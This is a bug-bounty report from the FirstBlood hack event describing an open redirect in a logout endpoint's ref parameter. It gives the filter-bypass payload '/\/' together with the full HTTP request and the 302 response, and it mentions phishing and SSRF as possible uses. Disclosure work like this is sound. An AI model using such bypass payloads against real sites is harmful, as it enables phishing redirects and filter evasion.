FirstBlood-#92 Open redirect at

On 2021-05-10, 0xconft reported:

Hi there,

I found an open redirect on your website at the /drpanel/logout.php endpoint in the ref parameter. There's a filter in place where the value must start with /, and // is also filtered, but I ended up bypassing this with the payload "/\/", which is reflected as "//" in the Location header and thus will redirect the victim to

An example of the impact caused by this vulnerability is that it can be combined with an SSRF attack to bypass filters, or it can be used for phishing.


GET /drpanel/logout.php?ref=/\/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: drps=5a5cfb7c6047d6dc8dbc411b2
Upgrade-Insecure-Requests: 1

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 10 May 2021 06:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: //
Content-Length: 0

P4 Low

Endpoint: /drpanel/logout.php

Parameter: ref

Payload: /\/

FirstBlood ID: 1
Vulnerability Type: Open Redirect

There is an open URL redirect vulnerability on /logout.php. The code expects the ref parameter to start with / and does not allow redirects to external domains, but this check can be bypassed.

Respect Earnt: 1000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.